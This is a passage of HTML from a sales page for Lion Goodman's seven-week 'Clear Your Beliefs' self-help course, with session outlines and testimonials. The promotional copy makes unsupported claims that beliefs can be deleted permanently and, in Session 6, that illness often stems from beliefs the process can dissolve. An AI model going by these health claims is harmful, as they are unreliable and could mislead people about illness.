worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n\r\n&nbsp;\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	